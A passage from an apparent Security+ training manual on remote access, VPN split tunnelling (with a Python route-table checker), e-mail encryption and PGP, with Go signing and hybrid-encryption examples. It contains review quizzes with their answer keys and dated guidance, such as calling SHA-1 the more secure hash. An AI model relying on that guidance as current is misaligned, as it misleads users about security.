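Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.1.1    192.168.1.50      20
         10.0.0.0        255.0.0.0         10.8.0.5        10.8.0.5       1
         10.8.0.5  255.255.255.255        127.0.0.1       127.0.0.1      50
        127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1       1
      192.168.1.0    255.255.255.0     192.168.1.50    192.168.1.50      20
"""

# Same PC after the client is told to send all traffic through the tunnel: a second default
# route on the VPN adapter with a lower metric now wins for any Internet destination.
ROUTES_FULL = ROUTES_SPLIT + \
    "          0.0.0.0          0.0.0.0         10.8.0.5        10.8.0.5       1\n"


def parse_route_table(text):
    """Turn the five-column listing into route dicts; header and non-route lines are skipped."""
    routes = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        dest, mask, gateway, interface, metric = parts
        try:
            network = ipaddress.IPv4Network(f"{dest}/{mask}", strict=False)
            routes.append({"network": network, "gateway": gateway,
                           "interface": interface, "metric": int(metric)})
        except ValueError:      # not a route line (stray text in the listing)
            continue
    return routes


def best_route(routes, address):
    """Longest-prefix match, lowest metric on ties: the route the stack would actually use."""
    matches = [r for r in routes if address in r["network"]]
    if not matches:
        return None
    return max(matches, key=lambda r: (r["network"].prefixlen, -r["metric"]))


def assess_split_tunnel(route_text, vpn_interface, corp_networks, internet_probe="198.51.100.7"):
    """Report whether Internet traffic leaves through the VPN adapter ("full tunnel") or through
    another interface while corporate prefixes go over the VPN ("split tunnel"), plus any
    corporate prefix that is not reached through the VPN at all."""
    routes = parse_route_table(route_text)
    internet = best_route(routes, ipaddress.IPv4Address(internet_probe))
    not_via_vpn = []
    for prefix in corp_networks:
        net = ipaddress.IPv4Network(prefix)
        r = best_route(routes, net.network_address)
        if r is None or r["interface"] != vpn_interface:
            not_via_vpn.append(prefix)
    if internet is None:
        mode = "no Internet route"
    elif internet["interface"] == vpn_interface:
        mode = "full tunnel"
    else:
        mode = "split tunnel"
    return {"mode": mode,
            "internet_interface": internet["interface"] if internet else None,
            "corp_networks_not_via_vpn": not_via_vpn}


if __name__ == "__main__":
    corp = ["10.0.0.0/8", "172.16.0.0/12"]      # constructed corporate prefixes
    print(assess_split_tunnel(ROUTES_SPLIT, "10.8.0.5", corp))
    print(assess_split_tunnel(ROUTES_FULL, "10.8.0.5", corp))
```

The first table yields "split tunnel" with 172.16.0.0/12 reported as not reachable over the VPN; the second yields "full tunnel" because the 0.0.0.0 route on the VPN adapter has the lower metric. On the Windows clients in this unit the equivalent setting is the "Use default gateway on remote network" option in the VPN connection's TCP/IP advanced properties; the check above verifies the resulting routing state rather than trusting the checkbox.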

Unsecured data files
As telecommuters download data files to their home PCs, all safeguards implemented at
the corporate office to protect sensitive information are negated. The central office has
legally lost control over that data.
With limited physical protection, hackers can steal portable computers or hard drives
and, given enough time, break any security in place. The attacker can gain access to
corporate data and, potentially, the corporate network.

Compromised certificates
Many IT professionals use digital certificates to add a layer of security to their VPN
clients. In the context of a computer system in an uncontrolled environment, the
certificate can be more vulnerable than traditional password authentication. The attacker
can easily crack a weak pass-phrase using brute force. Once compromised, the
certificate could be used to authenticate the attacker to the central office and even other
businesses. Unlike passwords that change regularly, certificate pass-phrases can be valid
for a year or more.

War dialing
War dialing refers to calling a block of numbers randomly until a modem answers. If the
attacker finds a modem, he might use it to dial into another network to avoid long-
distance charges or to mask his identity during an attack.

Limited accounting
Another issue concerning remote access is the lack of auditing. A record of security,
system, and application events only exists on the compromised system, a serious
violation of the standard for event logging. The moment the VPN link is terminated, the
remote computer’s state cannot be guaranteed.

Misconfigured firewalls
Home systems connected to the Internet through broadband or cable modem are sharing
a bus with other computers in the neighborhood. This provides many opportunities for
an attacker to send and receive data undetected. As long as the computer is on, it’s
subject to attack. In addition, personal firewalls provide a false sense of security: when
misconfigured, they are ineffective in protecting the system against eavesdroppers and
hackers.

Solutions
The following recommendations will protect the remote PC against most threats:
    • Install a personal firewall at the remote PC. Filter both incoming and outgoing
      packets.
    • Configure Web browsers to limit browser plugins, such as ActiveX and
      JavaScript.
    • Make sure PC operating systems and applications have updated security patches.
    • Use virus-scanning software and update it religiously. Set it to scan incoming
      e-mail and attachments.
    • Disable cookies to prevent monitoring of browser habits.
    • Use strong passwords.
    • Encrypt sensitive and critical information.
One very effective solution that removes the need for all the above precautions is to
provide the employee with a remote session (or thin-client) solution. This eliminates the
issue of storing data on the remote computer. Thin clients have no local storage or
functionality beyond connecting to a remote session server. When the connection to the
central office is broken, the data stays safely at the central office.

Configuration of a remote access policy
While remote access is an essential tool for today’s businesses, it also has the potential
to open a wide range of security holes. One way an administrator can overcome this is
by using Windows Server 2003 Remote Access Policies. Remote Access Policies can
lock down a remote access system to ensure that only those intended to have access are
actually granted it.

Do it!                         D-1:     Configuring a remote access policy

                               Instructor note: For this activity, students will work in pairs. Each partnership will use
                               two machines, Server-X and Server-Y. Instruct students to substitute their server’s
                               hostname for Server-X and their partner’s server hostname for Server-Y.

                                Here’s how                                        Here’s why

                                 1 On Server-X, click Start

                                    Choose Administrative Tools,                  To access the Routing and Remote Access
                                    Routing and Remote Access                     window.

                                 2 Expand SERVER-X

                                 3 Right-click Remote Access Policies

                                    Choose New Remote Access Policy               To start the New Remote Access Policy wizard.

                                 4 Click Next

                                 5 In the Policy name box, type
                                    Allow all users access

                                    Click Next

                                 6 Click Next                                     To accept the default access method of VPN.

                                 7 Select User

                                    Click Next

                                 8 Click Next                                     To accept the default authentication method.

                                 9 Click Next                                     To accept the default Policy Encryption Level.

                                10 Click Finish

                                11 Double-click Remote Access Policies            You’ll see the Allow all users access policy in
                                                                                  the right pane.

                                12 Double-click Allow all users access            To display the Properties of the remote access
                                                                                  policy.

                                13 Select Grant remote access permission          Remote access policies are configured to deny
                                                                                  rather than grant access by default.

                                    Click OK                                      To save your changes.

                                14 Close the Routing and Remote Access window

                                15 Open Computer Management                       Windows Server 2003 does not allow dial-in
                                                                                  access by default. In order to allow remote
                                                                                  access to a Windows Server 2003 server, you
                                                                                  must configure the Remote Access Permissions
                                                                                  on a user-by-user basis. Administrator is an
                                                                                  exception to this rule; Administrator is allowed
                                                                                  to connect remotely by default.

                                16 Expand Local Users and Groups

                                    Select Users

                                17 Double-click User1

                                18 Activate the Dial-in tab

                                19 Select Control access through                  To change the dial-in access for User1.
                                    Remote Access Policy

                                    Click OK

                                20 Repeat steps 17 through 19 for User2

                                21 Log on to Server-Y as User1 and try to         You’ll be able to connect using the remote
                                    access the Class VPN PPTP connection          access policy.

                                22 On Server-X, click Start                       To start the process of disabling Routing and
                                                                                  Remote Access.

                                    Choose Administrative Tools,
                                    Routing and Remote Access

                                23 Right-click Server-X

                                24 Choose Disable Routing and Remote Access

                                    Click Yes                                     User1 is disconnected from the server when the
                                                                                  service is stopped.

                                25 Close all windows


Unit summary: Remote access
Topic A   In this topic, you learned that with the continued growth of remote access computing,
          the need for remote access security has become paramount. You learned about some of
          the challenges faced when communicating over unsecured dial-up, ISDN, DSL, and
          cable modem channels.
Topic B   In this topic, you learned about the various authentication methods used for remote
          access. You learned about the IEEE 802.1X protocol, which builds on the standards
          outlined in the Point-to-Point Protocol (PPP) and Extensible Authentication
          Protocol (EAP) to control access to the corporate network. You also learned about
          Remote Authentication Dial-in User Service (RADIUS), which uses open protocols
          to provide a centralized and scalable security system, and Terminal Access Controller
          Access Control System (TACACS+), an authentication protocol developed by Cisco
          Systems to address the need for multiprotocol support and scalability.
Topic C   In this topic, you learned about VPN technology and its tunneling protocols.
          Corporate networks use site-to-site and remote access VPNs to connect remote offices
          and users to the corporate network. Four tunneling protocols commonly used in VPN,
          Point-to-Point Tunneling Protocol (PPTP), L2TP, Secure Shell, and IPSec, use
          encapsulation and encryption to transmit sensitive data over the Internet.
Topic D   In this topic, you learned about the different vulnerabilities associated with
          telecommuting. Many large companies have begun using telecommuting as a method
          to reduce costs and improve employee satisfaction; unfortunately, the benefits gained by
          telecommuting come with the price of an increased security threat.

          Review questions
           1 PPTP is built upon _______ and ________, two well-established communications
             protocols.
              A PPP, UDP
              B   PPP, TCP/IP
              C LDAP, PPP
              D TCP/IP, UDP
           2 SSH uses a _____________ key authentication method to establish a secure
             connection.
              A Private
              B   Public
              C Encrypted
              D Skeleton
           3 The RADIUS architecture allows all information to be located on a single central
             database. True or false?
              True

                    4 _____________ is an authentication method that was developed to address
                      scalability and connection-oriented services.
                      A 802.1X
                      B RADIUS
                      C X.25
                      D   TACACS+

                    5 IPSec uses a(n) ______________ algorithm for negotiating which keys to use for
                      symmetric encryption.
                      A   Asymmetric
                      B Symmetric
                      C Proprietary
                      D Encryption
                    6 What are the available PPTP protocol enhancements? (Choose all that apply.)
                      A PPP is multiprotocol
                      B Offers authentication
                      C Offers methods of privacy and compression of data
                      D   All of the above
                    7 RADIUS always encrypts the password in the packet. True or false?
                      True

                    8 TACACS+ separates which of the following?
                      A   Authentication, authorization, and accounting
                      B Authentication, authorization, and availability
                      C Authorization, accounting, and availability
                      D Authentication, accounting, and availability
                    9 The acronym “NAS” stands for network authentication server. True or false?
                      False: It means network access server.

                  10 Remote access logging can log which of the following events?
                      A Accounting requests
                      B Authentication requests
                      C Periodic status
                      D   All of the above


Unit 5
E-mail
         Unit time: 120 minutes

         Complete this unit, and you’ll know how to:

         A Define secure e-mail and how it works.

         B Describe the characteristics of PGP and
            S/MIME.

         C Identify and safeguard against e-mail
            vulnerabilities.


Topic A: Secure e-mail and encryption
                         This topic covers the following CompTIA Security+ exam objective:

                          #        Objective

                          4.2      Understand how cryptography addresses the following security concepts
                                    • Confidentiality
                                    • Integrity
                                        • Digital Signatures
                                    • Authentication
                                    • Non-Repudiation
                                        • Digital Signatures




                         E-mail
Explanation              Over the course of the past decade, electronic mail has become the mission-critical
                         business application and has changed the way we work forever. The result has been a
                         massive increase in productivity; however, e-mail is an incredibly vulnerable tool. For
                         the most part, it is transmitted across the Internet in plaintext, so any intermediary could
                         read or modify it; worse, anyone could set up an e-mail account and claim to be someone
                         else.
                         E-mail security is not the only challenge to maintaining the utility and productivity
                         gains offered by e-mail. Floods of spam, or unrequested junk mail, are another hazard
                         that workers in the new digital office must navigate. Hoaxes further threaten to reduce
                         worker productivity and create chaos on the corporate network.
                         The technologies presented in this unit, Pretty Good Privacy (PGP) and
                         Secure/Multipurpose Internet Mail Extension (S/MIME), seek to ensure the integrity
                         and privacy of information by wrapping security measures around the e-mail data itself.
                         These two competing standards use public key encryption techniques.

                         Goals of secure e-mail
                         Secure e-mail uses cryptography to secure messages transmitted across insecure
                         networks. The advantage of e-mail encryption is that e-mail can be transmitted over
                         unsecured links without risk that the e-mail will be read or modified. Further, the e-mail
                         can be stored in encrypted form, protecting the contents from prying eyes long after it
                         has been delivered to its destination.
                         Secure e-mail provides four main features:
                                • Confidentiality — By encrypting messages, the sender and the recipient can
                                  transmit data to each other over an unsecured or monitored link (i.e., the
                                  Internet) without worrying that their communications are monitored. That is to
                                  say, secure e-mail provides a guarantee of privacy.
                                • Integrity — The communicating parties can also be sure their data has not been
                                  modified while in transit. This is a very important feature for many government
                                  and commercial applications.

                              • Authentication — Secure e-mail uses secret encryption keys that only the
                                owners know and have access to, so the recipient of the e-mail knows for a fact
                                that it was sent by the person it purports to be from.
                              • Nonrepudiation — Just as with authentication, the recipient of the message
                                knows for a fact that the message was sent by the person appearing in the
                                messages FROM: field, and that the details of the message body were received
                                as they were written. The sender cannot claim the message did not originate
                                from his or her computer or the contents of the message were changed in transit.

                          Terminology
                          The key cryptography concepts you need to understand are encryption, digital
                          signatures, and digital certificates. These concepts are covered briefly in this section so
                          you can recognize how they are used to make e-mail more secure.

                          Instructor note: Inform the students that, although most of the key terms and concepts
                          relating to cryptography are explained in this unit, they are covered in depth in the
                          Cryptography unit.

                          Encryption
                          When people think of secure e-mail, encryption is the technology that comes to mind.
                          Encryption provides privacy, integrity, authentication, and nonrepudiation. These are
                          the primary features of secure e-mail:




                          Exhibit 5-1: How conventional encryption works

                          Encryption is the conversion of data into code to make it unreadable, as shown in
                          Exhibit 5-1. It is accomplished by taking data and passing it, along with a value, called a
                          key, through an algorithm that makes the data completely unreadable. The only way to
                          recover the information is to reverse the process using the appropriate key. Even though
                          the encryption algorithm is known, without also having the key, it is impossible to
                          recover the original data.
                          The two main types of encryption are: conventional cryptography, in which the same
                          key is used for encryption and decryption, and public key cryptography, which uses a
                          publicly distributed key for encryption and a secret private key for decryption.

                        Hash function
                        A hash function is a function that takes plaintext data of any length and creates a unique
                        fixed-length output. For example, the message could be 1 KB or 1 MB in size, but the
                        hash output on either message would be the same fixed length. The result of the hash
                        function is called a message digest. The essential principle of a cryptographically sound
                        hash function is that if the input were changed by a single bit, the message digest would
                        be different. It’s also important to remember that the original message cannot be derived
                        from the message digest; hash functions work only in one direction.
                        Two major hash functions are used today. SHA-1 (Secure Hash Algorithm 1) was
                        developed by the National Security Agency (NSA) and is considered the more secure of
                        the two commonly used algorithms. It produces 160-bit digests.
                        The other common hash algorithm is MD5 (Message Digest algorithm version 5), which
                        produces 128-bit digests. RSA Security has placed MD5 in the public domain; therefore,
                        no licensing is required to use it. Cryptography experts have shown that MD5 has major
                        flaws, and it is likely that it will be broken in the future.

                        Instructor note: Information about breaking MD5 can be found at
                        scramdisk.clara.net/pgpfaq.html#SubMD5Implic.


Do it!                  A-1:     Discussing encryption and hash functions
                          Questions and answers
                          1 What is one measure a user can use to ensure confidentiality when sending e-mail
                            messages?

                             Encrypt the messages

                          2 A message digest is the product of running a message through a hash function.
                            True or false?

                             True

                          3 Once data is encrypted, the only way to recover the information is to _____.
                             A      Attach a digital certificate
                             B      Share the private key
                             C      Pass it through a hash function
                             D      Reverse the process using the appropriate key

                          4 The hash function is a good method for determining whether a message has been
                            altered. True or false?

                             True

                          5 A hash function takes plaintext and creates a fixed-length output regardless of the
                            size of the message. True or false?

                             True

              Digital signatures
Explanation   A digital signature is a digital code that can be attached to an electronic message to
              uniquely identify the sender. Digital signatures provide integrity, authentication, and
              nonrepudiation. That is, by using a digital signature, a user can receive a plaintext
              message and still know with a high degree of certainty that the message has not been
              tampered with, and indeed comes from the person it claims to be from with no
              possibility the sender could truthfully deny sending the message.
              Digital signatures are created using hash functions. You perform a hash on the message
              to create a message digest, and then you “sign” the message by encrypting the message
              digest with your own private key, as shown in Exhibit 5-2.




              Exhibit 5-2: How digital signatures are created

              When the receiver gets the message, that person can verify its integrity: the message
              digest is recreated by performing a hash on the message using the same hashing
              algorithm as the sender. The message digest is then compared against the digest that
              came with the message (after decrypting it with the sender’s public key). If the two
              versions of the digest are the same, then the message has not been altered. The fact that
              the receiver can recover the original message digest using the sender’s public key
              guarantees its authenticity and provides nonrepudiation.
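The hash-and-sign flow of Exhibit 5-2, together with the one-bit avalanche property described under Hash function, as an added example in Go; this is not code from the course, PGP or S/MIME. Assumptions: a 2048-bit RSA key pair with PKCS#1 v1.5 signature padding, SHA-256 as the hash in place of the SHA-1 and MD5 the text names, and a constructed sample message.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// NewSignerKey generates the sender's key pair (assumption: 2048-bit RSA).
func NewSignerKey() (*rsa.PrivateKey, error) { return rsa.GenerateKey(rand.Reader, 2048) }

// Digest is the hash step: a message of any length becomes a fixed-length message
// digest. SHA-256 (32 bytes) is assumed here in place of the SHA-1 and MD5 the text names.
func Digest(message []byte) [32]byte { return sha256.Sum256(message) }

// DigestHex renders a digest so the effect of a one-bit change in the input is visible.
func DigestHex(message []byte) string {
	d := Digest(message)
	return hex.EncodeToString(d[:])
}

// Sign is the signing step of Exhibit 5-2: the digest, not the message, is transformed
// with the sender's private key (PKCS#1 v1.5 signature padding is assumed).
func Sign(priv *rsa.PrivateKey, message []byte) ([]byte, error) {
	d := Digest(message)
	return rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, d[:])
}

// Verify is the receiver's side: recompute the digest over the received plaintext
// and check it against the signed digest with the sender's public key. The message
// itself is never encrypted, so a signature gives integrity, authentication and
// nonrepudiation, not confidentiality.
func Verify(pub *rsa.PublicKey, message, signature []byte) bool {
	d := Digest(message)
	return rsa.VerifyPKCS1v15(pub, crypto.SHA256, d[:], signature) == nil
}

func main() {
	priv, err := NewSignerKey()
	if err != nil {
		panic(err)
	}
	msg := []byte("Constructed sample: please pay invoice 1042 on Friday.")
	sig, err := Sign(priv, msg)
	if err != nil {
		panic(err)
	}
	fmt.Println("digest:           ", DigestHex(msg))
	fmt.Println("original verifies:", Verify(&priv.PublicKey, msg, sig))
	// Flip one bit in transit: the recomputed digest no longer matches the signed one.
	tampered := append([]byte(nil), msg...)
	tampered[len(tampered)-1] ^= 0x01
	fmt.Println("tampered digest:  ", DigestHex(tampered))
	fmt.Println("tampered verifies:", Verify(&priv.PublicKey, tampered, sig))
	// A signature made with someone else's private key fails against this public key,
	// which is what gives the receiver authentication of the sender.
	other, _ := NewSignerKey()
	otherSig, _ := Sign(other, msg)
	fmt.Println("other key verifies:", Verify(&priv.PublicKey, msg, otherSig))
}
```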

                 Digital certificates
                 A digital certificate is an attachment to an electronic message used for security
                 purposes. It provides a type of credential, much like a passport or driver’s license.
                 Digital certificates are similar to digital signatures in that a public key and private key
                 are used, but with digital certificates, there is an endorser who vouches for the
                 authenticity and identity of the public key holder. The digital certificate contains the
                 following information:
                     • The owner’s public key, which is used to encrypt messages to its owner
                     • One or more pieces of information that uniquely identify the owner (for
                       example, a name and e-mail address)
                     • The digital signature of an endorser (called the Certificate Authority), stating
                       that the public key actually belongs to the person in question
                 Exhibit 5-3 shows the structure of one major digital certificate standard, the X.509
                 certificate.




                 Exhibit 5-3: A digital certificate

                 Much like a real certificate, a digital certificate helps others to verify the owner of the
                 public key is who he says he is. This is a valuable addition to the normal features of
                 encryption. Digital certificates are designed to answer the question of whom an e-mail
                 address and public key really belong to; you don’t know, unless the sender has a digital
                 certificate and you trust the authority that signed the certificate. In the real world, you
                 might rely on a passport to authoritatively identify the person who carries it, but only
                 because you trust the government to issue the passport only to the right person. The
                 same can be said for digital certificates: the certificate is only as good as your trust for
                 the authority that issued it.

Combining encryption methods
PGP and S/MIME use a combination of conventional encryption and public key
encryption. For that reason, these technologies are said to be hybrid cryptosystems. The
reason for this hybrid is to overcome the shortcomings of both public key and
conventional (or symmetrical) cryptosystems.
Conventional encryption is very fast, but it uses symmetrical keys for encryption and
decryption, which is to say, both the recipient and the sender must have the same secret
key to encode and decode their messages. The problem lies in sending the secret key to
the other person without it being compromised. Worse, in order to keep your
conversations private, you need a different set of keys for every person with whom you
communicate. Conventional encryption results in what is called the key distribution problem
(the challenge of getting keys securely to their recipients).
Conversely, public key encryption is slow but has solved the problem of key
distribution. In this scheme, each person has a private key and a public key, as shown in
Exhibit 5-4.




Exhibit 5-4: How public key encryption works

The private key is used for decryption and is kept secret. The public key is used for
encryption and is freely distributed. For example, Mary’s public key is the only key that
anyone needs to encrypt a message to her. Once a message has been encrypted using
Mary’s public key, it can only be decrypted with her private key. Not even the sender
can decrypt the message once it’s been encrypted with Mary’s public key. So key
distribution is not an issue with public key technology—but the actual process of
encrypting is much, much slower.

Do it!              A-2:      Discussing digital signatures and certificates
                      Questions and answers
                       1 Put the following steps in their proper sequence to determine whether a message
                         has been tampered with or came from someone other than the specified sender.

                          ___ The receiver compares his message digest value against the          6
                          digest that came with the message.

                          ___ The receiver decrypts the message.                                  4

                          ___ You perform a hash on the message to create a message digest.       1

                          ___ The receiver gets the message.                                      3

                          ___ Encrypt the message digest with your own private key.               2

                          ___ The receiver performs a hash on the message to create a             5
                          message digest.

                       2 Which of the following uses the same key to encrypt and decrypt?
                          A    Conventional cryptography
                          B    Traditional cryptography
                          C    Public key cryptography
                          D    Private key cryptography

                       3 Which of the following uses one key to encrypt and another to decrypt?
                          A    Conventional cryptography
                          B    Traditional cryptography
                          C    Public key cryptography
                          D    Private key cryptography

                       4 Digital signatures provide integrity, confidentiality, and authentication. True or
                         false?

                          False. They do not provide confidentiality.

                       5 Digital certificates contain which of the following types of information?
                          A    The owner’s public key
                          B    One or more pieces of information that uniquely identify the owner
                          C    The digital signature of an endorser
                          D    All of the above

6 A hash function takes plaintext and creates a fixed-length output regardless of the
  size of the message. True or false?

  True

7 What is the result of a hash function?
  A      Message
  B      Message digest
  C      Cipher
  D      Cipher text

                     The encryption process
Explanation          PGP and S/MIME encryption systems follow a specific process to secure e-mail
                     messages before they are sent. The steps are:
                        1 The message is compressed (only with PGP).
                        2 A session key is created.
                        3 The message is encrypted using the session key with a symmetrical encryption
                           method.
                        4 The session key is encrypted with an asymmetrical encryption method.
                        5 The encrypted session key and the encrypted message are bound together and
                           transmitted to the recipient.
                     The same steps are used, in reverse, to decrypt the message.
                     If PGP is used, then the plaintext is compressed using the ZIP compression routines,
                     provided it is long enough and is not already compressed. The reason for this is that
                     compression adds to the cryptographic strength of the encrypted document because it
                     reduces the patterns in the plaintext. These patterns are then represented in the
                     encrypted version and are one of the primary points of cryptanalysis attack. This is the
                     same method used by commercial compression packages such as WinZip and PKZIP.
                     The e-mail encryption system creates a session key using a random number generated
                     from the user’s mouse movements and keystrokes. These inputs help to ensure that the
                     number really is random—computers have a hard time generating truly random
                     numbers on their own.
                     The plaintext is then encrypted using the session key and a conventional encryption
                     algorithm. Conventional encryption is about 1000 times faster than public key
                     encryption, so using the session key significantly speeds up the process of encrypting
                     the user’s data.
                     Notice that PGP and S/MIME use different conventional encryption systems.
                     The session key is encrypted using the recipient’s public key, as shown in Exhibit 5-5. It
                     is decrypted using the recipient’s private key. This technique leverages the speed and
                     convenience of conventional encryption, but avoids the problem of distributing
                     symmetrical keys that is inherent to conventional encryption; public key encryption
                     allows the symmetrical key to be distributed along with the cipher text.
                     The encrypted session key and the encrypted data are bound together. The encrypted
                     message might now be sent over an unsecured network or channel to the recipient
                     without fear the contents can be read or modified in transit.
                     When you receive such an encrypted message, your e-mail client unbundles the
                     encrypted message and the encrypted session key. The session key is decrypted using
                     your private key. Then the session key is used to decrypt the contents of the message, as
                     shown in Exhibit 5-6. All this happens transparently to the end-user.




Exhibit 5-5: How secure e-mail encryption works




Exhibit 5-6: How secure e-mail decryption works
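The hybrid scheme from Combining encryption methods, carried through the steps of The encryption process (Exhibits 5-5 and 5-6), as an added Go example; this is not code from the course, PGP or S/MIME. Assumptions: the recipient holds a 2048-bit RSA key and the session key is wrapped with RSA-OAEP, the conventional cipher is AES-256-GCM rather than CAST, IDEA or 3DES, the session key comes from the operating system's random generator rather than mouse and keyboard timing, step 1 (compression) is left out, and the message is constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// SecureMessage is the bundle of step 5 that travels to the recipient. It is a struct
// made for this example, not the PGP or S/MIME wire format.
type SecureMessage struct {
	WrappedKey []byte // session key, RSA-OAEP encrypted with the recipient's public key
	Nonce      []byte // AES-GCM nonce, fresh for every message
	Ciphertext []byte // message body, AES-256-GCM under the session key
}

// NewRecipientKey generates the recipient's key pair (assumption: 2048-bit RSA).
func NewRecipientKey() (*rsa.PrivateKey, error) { return rsa.GenerateKey(rand.Reader, 2048) }

// newGCM turns a session key into the conventional (symmetric) cipher used for the body.
func newGCM(sessionKey []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(sessionKey)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Encrypt performs steps 2 to 5 from the text (step 1, compression, is left out).
func Encrypt(pub *rsa.PublicKey, plaintext []byte) (*SecureMessage, error) {
	// Step 2: a fresh random session key, used for this one message only. It comes from
	// the OS CSPRNG rather than from mouse movements and keystrokes (an assumption).
	sessionKey := make([]byte, 32)
	if _, err := rand.Read(sessionKey); err != nil {
		return nil, err
	}
	// Step 3: conventional (symmetric) encryption of the body with the session key.
	gcm, err := newGCM(sessionKey)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	ciphertext := gcm.Seal(nil, nonce, plaintext, nil)
	// Step 4: the slow asymmetric operation runs only over the 32-byte session key.
	// Once wrapped, only the holder of the recipient's private key can recover it.
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, sessionKey, nil)
	if err != nil {
		return nil, err
	}
	// Step 5: bind the wrapped key and the ciphertext together for transmission.
	return &SecureMessage{WrappedKey: wrapped, Nonce: nonce, Ciphertext: ciphertext}, nil
}

// Decrypt runs the same steps in reverse. A tampered ciphertext or the wrong private
// key produces an error, never silently wrong plaintext.
func Decrypt(priv *rsa.PrivateKey, m *SecureMessage) ([]byte, error) {
	sessionKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, m.WrappedKey, nil)
	if err != nil {
		return nil, fmt.Errorf("unwrap session key: %w", err)
	}
	gcm, err := newGCM(sessionKey)
	if err != nil {
		return nil, err
	}
	body, err := gcm.Open(nil, m.Nonce, m.Ciphertext, nil)
	if err != nil {
		return nil, fmt.Errorf("message altered or wrong key: %w", err)
	}
	return body, nil
}

func main() {
	priv, err := NewRecipientKey()
	if err != nil {
		panic(err)
	}
	msg := []byte("Constructed sample: the Q3 figures are attached; please keep them confidential.")
	sealed, err := Encrypt(&priv.PublicKey, msg)
	if err != nil {
		panic(err)
	}
	opened, err := Decrypt(priv, sealed)
	fmt.Printf("round trip ok: %v (err=%v)\n", bytes.Equal(msg, opened), err)
	// One flipped bit in transit is detected when the recipient decrypts.
	sealed.Ciphertext[0] ^= 0x01
	_, err = Decrypt(priv, sealed)
	fmt.Println("after tampering:", err)
}
```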

Do it!              A-3:      Understanding the encryption process
                      Questions and answers
                       1 Put the following steps in the correct sequence to describe the encryption process.

                          ___ A session key is created.                                              2

                          ___ The message is compressed (only with PGP).                             1

                          ___ The session key is encrypted with an asymmetrical encryption           4
                          method.

                          ___ The encrypted session key and the encrypted message are bound          5
                          together and transmitted to the recipient.

                          ___ The message is encrypted using the session key with a                  3
                          symmetrical encryption method.

                       2 S/MIME compresses plaintext using ZIP compression before encrypting the
                         message. True or false?

                          False: PGP compresses the plaintext first.

                       3 In what manner does compression strengthen encryption?

                          It reduces the patterns in the plaintext.

                       4 How is the session key generated?

                          The encryption system uses a random number generated from the user’s mouse movements
                          and keystrokes.

                       5 The plain text message is encrypted using the public key to create cipher text.
                         True or false?

                          False: The plain text message is encrypted using the session key.

                       6 How is the session key protected during transmission over the Internet?

                          The session key is encrypted using the recipient’s public key.

                       7 The encrypted session key is sent in a separate message from the cipher text. True
                         or false?

                          False: It is sent with the cipher text.

                       8 The session key is decrypted using the recipient’s private key. True or false?

                          True


Topic B: PGP and S/MIME encryption
              This topic covers the following CompTIA Security+ exam objective:

               #        Objective

               2.2      Recognize and understand the administration of the following e-mail security concepts
                         • S/MIME (Secure Multipurpose Internet Mail Extensions)
                         • PGP




              Background on PGP
Explanation   PGP and S/MIME both use encryption and digital signatures to achieve the goal of
              secure e-mail; however, their formats and implementations are significantly different.
              PGP establishes authenticity through a “Web of trust” and places the responsibility of
              authentication on each user. S/MIME uses a Certificate Authority (CA) to establish
              trust. The two protocols are incompatible.
              PGP is an encryption technology that has grown up with the Internet. PGP was
              originally written by Phil Zimmermann in 1991 to fill the gap in effective, commercially
              available encryption software.
              PGP supports four major symmetric encryption methods:
                     • CAST — An algorithm for symmetric encryption named after its designers
                       (Carlisle Adams and Stafford Tavares). CAST is owned by Nortel, but available
                       to anyone on a royalty-free basis. CAST is a fast method of encrypting data and
                       has stood up to attempted cryptanalytic attacks. CAST uses a 128-bit key and has
                       no weak or semi-weak keys.
                     • International Data Encryption Algorithm (IDEA) — Originally published in
                       1992, IDEA has a decent record of withstanding attacks; however, the fact
                       that the algorithm must be licensed from Ascom Systec has impeded its
                       adoption. IDEA uses a 128-bit key.
                     • Triple Data Encryption Standard (3DES) — Based on the DES, which uses a 56-
                       bit key, 3DES runs the same algorithm three times to overcome its short key
                       size. Although (3 x 56) bits equals 168 bits, the effective key strength of 3DES
                       is approximately 129 bits. 3DES is perhaps the industry standard algorithm for
                       encryption. 3DES is much slower than either IDEA or CAST.
                     • Twofish — One of five algorithms that were finalists to be selected for the
                       Advanced Encryption Standard (AES), Twofish was selected for inclusion into
                       PGP before the winner was announced in 2001. Although Twofish was not
                       ultimately selected to be used in the standard, it is a strong algorithm that has
                       withstood examinations by industry experts. Like all AES contestants, Twofish
                       has 128-bit, 192-bit, and 256-bit key sizes.

                  PGP certificates
                  PGP defines its own standard for digital certificates. PGP certificates are very similar to
                  X.509 certificates in some respects but are notably more flexible and extensible.
                  One unique aspect of the PGP certificate format is that a single certificate can contain
                  multiple signatures. Several or many people might sign the key/identification pair to
                  attest to their own assurance that the public key definitely belongs to the specified
                  owner. If you look on a public certificate server, you might notice that certain certificates,
                  such as that of PGP’s creator, Phil Zimmermann, contain many signatures. The table
                  below provides an outline of the PGP certificate format.

                   Certificate                                  Certificate format

                   PGP version number                           Version of PGP that was used to create the key associated
                                                                with the certificate.

                   Certificate holder’s public key              Public portion of your key pair, together with the algorithm
                                                                of the key, which is RSA, RSA Legacy, Diffie-Hellman or
                                                                Digital Signature Algorithm (DSA).

                   Certificate holder’s information             Identity information about the user, such as his or her
                                                                name, user ID, e-mail address, ICQ number, photograph,
                                                                and so on.

                   Digital signature of the certificate owner   Signature created with the private key corresponding to
                                                                the public key associated with this certificate.

                   Certificate’s validity period                Start date/time and expiration date/time; indicates when
                                                                the certificate will expire.

                   Preferred symmetric encryption algorithm     Encryption algorithm to which the certificate owner prefers
                   for the key                                  to have information encrypted; the supported algorithms
                                                                are CAST, IDEA, 3DES, and Twofish.

Do it!   B-1: Discussing PGP
         Questions and answers
